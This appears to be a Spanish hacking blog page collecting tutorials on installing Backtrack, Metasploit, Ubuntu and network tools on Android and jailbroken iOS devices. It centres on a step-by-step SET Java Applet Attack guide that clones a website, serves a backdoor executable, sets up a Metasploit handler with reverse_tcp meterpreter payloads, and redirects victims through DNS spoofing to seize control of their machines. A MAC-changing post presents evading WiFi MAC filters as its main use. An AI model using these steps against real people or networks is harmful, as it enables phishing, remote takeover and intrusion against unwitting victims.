Instalar MetaSploit en Android

Como todos sabemos, MetaSploit viene por defecto instalado en Backtrack, y como instalar solo MetaSploit era bastante complicado aquí les traigo un tutorial para instalar Backtrack 5 en Android


TUTORIAL AQUÍ: Backtrack 5 en Android Tutorial

Read More

SET y MetaSploit Java Applet Attack en Backtrack Tutorial

Java Applet Attack es uno de mis ataques preferidos. Es muy efectivo y discreto pero lo que mas me gusta de el es lo fácil que es llevarlo a cabo. Solo necesitas tener Backtrack y tener instalado solo 2 aplicaciones: SET y MetaSploit


Java applet Attack afecta:

• Windows Systems
• Linux Systems and
• Mac OS X

Instrucciones:

1. Primero ejecutamos la aplicacion SET yendo a: Applications >> BackTrack >> Exploitation Tools >> Social Engineering Tools >> Social Engineering Toolkits >> SET                                      

2. Una vez iniciado SET, elegimos la opción 2) Website Attack Vector. Para ello ponemos 2 y le damos a enter.

3. Ahora nos aparecerá otro menú como el de la imagen de abajo en el que seleccionaremos la opción 1) Java Applet Attack Method (de la misma manera que el paso anterior reemplazando el 2 por el 1)     

                                                                              

4. A continuación aparecerá otro menú en el que seleccionaremos la opción 2) Site Cloner  

                               

5. Ahora tendremos que introducir la pagina que queremos clonar para que sea nuestra pagina infectada. Podemos introducir cualquiera por ejemplo: www.apk-hacks.blogspot.com     

  

6. El siguiente paso consiste en elegir que Payload vamos a utilizar, en este caso vamos a seleccionar la siguiente:                                

7. A continuacion vamos a tener que elegir que metodo de encripcion vamos a querer. Nosotros vamos a usar 16) Backdoor Executable (BEST)

8. Lo siguiente va a ser elegir el puerto que queramos utilizar. (podemos darle directamente a enter para que SET elija el puerto)

9. Una vez seleccionado el puerto, SET iniciara MetaSploit

10. Una vez iniciado MetaSploit tendremos que ejecutar los siguientes comandos:

• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp (para ataques a Windows)
• set payload linux/x86/shell/reverse_tcp (para ataques a Linux)
• set LHOST "nuestra ip local"
• set LPORT "puerto que querramos utilizar"
• set ExitOnSession false
• exploit -j

11. Ahora lo unico que nos queda es hacer que nuestra victima entre a nuestra pagina infectada, para eso podemos utilizar Ettercap para rediccionar cualquier pagina, por ejemplo: www.facebook.com , a nuestra pagina infectada que sera la indicada en la imagen superior. Para saber como hacerlo lee DNS Spoofing con Ettercap en Backtrack Tutorial

12. Una vez que logramos que nuestra victima entre a nuestra pagina infectada, se le solicitará en una pequeña ventana que ejecute una aplicación de Java que requiere el sitio infectado, el cual la victima desconoce, por lo tanto el %99 de las personas la ejecutara. Cuando la victima le da a ejecutar, automáticamente se conecta a el ordenador del atacante proporcionándole control total de la victima.

13. Asi se vera cuando la victima haya caído en nuestra trampa:

14. Como vimos en la imagen anterior, se creo una sesion cuando recivimos la conexion de la victima. Lo que debemos hacer ahora para tomar el control de esa sesion es ejecutar el siguiente comando:

• session -i 1

Read More

Cambiar Dirección MAC en Windows y Linux Tutorial

Macchanger es una aplicación muy util para cambiar nuestra dirección MAC de la placa de red. Esto se puede utilizar para muchas cosas pero la mas conocida y popular es para acceder a redes WiFi con filtro MAC.

GNU / Linux:

1. Lo primero que tenemos que hacer es descargar la aplicación macchanger. Para eso nos dirigimos a terminal y introducimos el siguiente comando:  apt-get install macchanger
2. Una vez instalado, tenemos que averiguar nuestra interfaz de red, para ello ejecutamos el siguiente comando: airmon-ng

    3.   Aquí tendremos que buscar la interfaz que este en uso en nuestro ordenador, para ello nos fijamos cual de ellas tiene asociada nuestra ip local. En mi caso, como ven en la imagen de arriba, la mía es eth0 (si la tuya es diferente reemplaza eth0 por tu interfaz en los pasos que siguen)

   4.   Una vez obtenida nuestra interfaz de red, procederemos a cambiar nuestra dirección MAC. Para ello ejecutamos los siguientes comandos: (igual que en la imagen de arriba)

• ifconfig eth0 down 

• macchanger --mac 00:00:00:00:00:00 (introducir la MAC que queramos tener)

• ifconfig eth0 up

   5.   Listo! Ahora, para comprobar que funciono ejecuta: ifconfig y comprueba el resultado

Windows:

1. Para cambiar nuestra dirección MAC en windows usaremos un programa llamado "Windows MAC Address Changer".
2. Una vez descargado, lo instalamos y seguimos los pasos a continuación:
3. Primero seleccionamos nuestra Interfaz de Red: 
4. Le damos a "Change" y nos llevara al la siguiente pagina 
5. Seleccione su sistema operativo (si su sistema operativo Windows no está en la lista a continuación, sólo tienes que seleccionar "Windows XP") 
6. Ahora introducimos la dirección MAC que queramos tener y le damos a "Apply". Para que los cambios tengan efecto tenemos que reiniciar el equipo o desactivar y activar las Conecciones de Red

Read More

Aircrack, Nmap y Ettercap en iPhone, iPod, y iPad Tutorial

Aircrack es una aplicación de análisis de redes encalabrinamos WiFI(Escanear Puertos con Nmap Tutorial)

Ettercap es una aplicación que convierte a nuestro ordenador como intermediario entre las peticiones de DNS y que realiza la víctima y el punto de acceso. (DNS Spoofing Tutorial).

Requisitos:

• iPhone, iPod, o iPad con Jailbreak
• Mobile Terminal o iSHH
• Cydia instalado

Instrucciones:

Aircrack:

1. Primero que todo nos dirigimos a Cydia, Manage, Sources y le damos edit, luego a add, y introducimos la siguiente direccion: http://theworm.altervista.org/cydia/
2. Una vez instalada la repo, vamos a search, buscamos Aircrack-ng y lo instalamos.

Nmap:

1. Para instalar Nmap simplemente lo buscamos en Cydia y lo instalamos. (viene en una repo instalada en Cydia por defecto)
2. Si quieres aprender como utilizar Nmap y para que sirve visita Nmap Tutorial

TUTORIAL: Escanear Puertos con Nmap 

Ettercap:

1. Si ya has instalado la repo que utilizamos arriba para instalar Aircrack simplemente búscalo en cydia e instalado. Si este no es tu caso, repite el paso 1. de la instalación de Aircrack.
2. Si quieres aprender como utilizar Ettercap y para que sirve visita DNS Spoofing con Ettercap Tutorial

TUTORIAL: DNS Spoofing con Ettercap

Read More

Instalar Ubuntu en Android con Ubuntu Installer

A continuación les voy a explicar como instalar una distribución GNU / Linux, en este caso Ubuntu en un dispositivo Android.
Requisitos:

• Android 2.1 o superior.
• Procesador de 1Ghz (como mínimo), 
• Acceso Root
• Busybox instalado. Si no lo tienes puedes descargar un instalador.
• Kernel compatible con loop device support,
• 2,5 y 3,5 Gb de espacio de almacenamiento.
• Ubuntu installer.

Instrucciones:

1.1. Ejecutaremos la aplicación Ubuntu Installer.

1.2. Ahora le samos a Install Guide y seleccionaremos la versión de Ubuntu que queremos instalar:

1.3. Next:

1.4. Ahora le damos a Download Boot Script y esperamos a que se descargue. A continuación le damos a Download Full Ubuntu Image y esperamos a que se complete la descarga. El ultimo es la imagen completa de Ubuntu, por lo tanto va a tardar unos minutos.

1.5. Una vez descargados los archivos anteriores le damos a Download/install VNCviewer App y a Download/install Terminal App.

1.6.Cuando ya estén descargados e instalados ambos programas cerramos Ubuntu Installer.

2. A continuación, lo que necesitamos hacer ahora es ir a la carpeta de descargas de nuestra sdcard y buscar los primeros dos archivos que descargamos anteriormente. Una vez localizados, los descomprimimos en la raíz de la sdcard. Este paso puede hacerse desde nuestro dispositivo con algún administrador de archivos o directamente desde nuestro ordenador.

3. Abrimos Terminal Emulator y ejecutamos los siguientes comandos

• cd sdcard (nos dirijimos a la raiz de la sdcard)
• su (obtenemos permisos de superusuario)
• ls (listamos el contenido de la sdcard)

4. Después de ejecutar el comando "ls" veremos los archivos que descomprimimos en la lista como en la imagen a continuación. (el nombre del archivo con la extensión .sh puede variar, si el tuyo es diferente reemplaza el nombre de archivo ubuntuv6.sh por el tuyo en los comandos del siguiente paso)

5.  Ejecutamos el comando:

• sh ubuntuv6.sh

6.  A continuación nos pedirá que introduzcamos la resolución de la pantalla de nuestro dispositivo. Ejemplo: 1024×600. Si es que nos pregunta de vuelta que seleccionemos entre 2 opciones, seleccionamos la primera.

7. Minimizamos Terminal Emulator y lo dejamos corriendo en segundo plano.  (para eso le damos al boton Home)

8.  Ahora configuramos VNCviewer como en la imagen a continuacion. La contraseña es ubuntu.

9. Para Finalizar le damos a Connect, y como resultado tendremos Ubuntu iniciándose en nuestro terminal Android después de tan solo 9 sencillos pasos.

Ubuntu en tu ordenador desde tu dispositivo:

Lo único que necesitamos para poder correr el Ubuntu que tenemos instalado en nuestro terminal Android en nuestro Ordenador, es instalar un cliente VNC como por ejemplo RealVNC y conectarnos de la misma manera y con mismos datos que utilizamos con VNCviewer en nuestro dispositivo.
Como resultado tendremos Ubuntu móvil instalado en nuestro dispositivo con la posibilidad de correrlo en cualquier ordenador!

• Cualquier duda o problema comenta!

Read More

Aprende a codificar gratis en code.org!

   Aprende a Codificar como un profesional en Code.org ! 
¿No tienes idea de como programar? ¿Ni siquiera sabes de que se trata? No te preocupes! En code.org no necesitas ningún conocimiento previo para convertirte en un gran programador! 
   El gobierno de Estados Unidos y varias personalidades de la comunidad tecnológica, como Bill Gates, y Mark Zuckerberg, han lanzado esta nueva campaña inspirando a alumnos y profesores de todo el mundo para aprender y enseñar a codificar en las escuelas y universidades.

Read More

Instalar Metasploit en iPhone, iPod, iPad Tutorial

Para poder instalar "Metasploit" en nuestro dispositivo Apple vamos a necesitar Jailbreak y una conexión a Internet ya que vamos a necesitar descargar un par de aplicaciones

Funciona con todos los iPods, iPhones y iPads.

Instrucciones:

1. Abre Cydia. Busque e instale los siguientes paquetes:

• OpenSSH  (para obtener una consola de comandos).
• APT 0.7 Strict  (para instalar software desde consola de comandos).

2. Abre App Store. Busque e instale iSSH  (cliente SSH , el cual usaremos para poder instalar Metasploit mediante una conexión OpenSSH)

3. Conectese al iPhone a través de SSH. Usando el cliente iSSH, accese con la cuenta root y la contraseña alpine.

En iSSH vamos a Add Configuration y llenamos las opciones

• Host: IP de tu dispositivo (local)
• Port: 22
• Login: root
• Password: alpine

A continuación le damos a Save y volveremos a la pantalla de inicio de iSSH, en donde seleccionaremos la conexión que acabamos de crear y se abrirá una consola.

4. En la consola, ejecute los siguientes comandos:

NOTA: Do you want to continue [Y/n]?, le damos que si a todo ejecutando el comando "Y".

apt-get update
apt-get dist-upgrade
apt-get install wget subversion

wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb

dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3 (puede tardar bastante)

5. Listo! Para ejecutar Metasploit ejecutamos el comando:

cd /private/var/msf3
ruby msfconsole

Si todo funciona bien, después de un par de minutos deberá aparecer la siguiente pantalla:

Read More